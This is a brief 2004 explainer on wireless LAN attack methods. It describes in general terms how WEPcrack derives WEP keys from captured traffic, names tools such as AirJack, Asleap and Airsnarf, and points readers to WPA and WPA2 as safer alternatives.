There are many attack methods used to prey upon common wireless LAN vulnerabilities. Perhaps the most well-known of these is WEPcrack. WEPcrack and similar key-cracking tools take advantage of weaknesses in the Wired Equivalent Privacy (WEP) protocol that was originally used to encrypt traffic over 802.11 connections. By capturing and analyzing WEP-encrypted traffic, WEPcrack creates a list of keystreams that can be used to decrypt future traffic encrypted with those same keystreams. Once enough traffic is captured, the actual WEP key can be derived, letting the attacker decrypt all future traffic. Some weaknesses leveraged by WEPcrack have since been fixed in most products, increasing the time required to "brute force" crack WEP keys. For better protection, most WLAN products now offer safer alternatives to WEP, like TKIP (WPA) or AES (WPA2). For a primer on WLAN security, read the Wi-Fi Alliance security page.
Some of the other tools and techniques used to attack wireless LANs include denial-of-service tools like AirJack, password dictionary attack tools like Asleap, and rogue wireless access point tools like Airsnarf. You can find literally hundreds of white papers about WLAN Security at the CWNP Learning Center. Many of those papers describe WLAN attack methods and tools (free registration required to view most papers). If you browse around the Internet a bit, you'll easily find several websites dedicated to listing WLAN attack tools and describing what they do.
This was first published in September 2004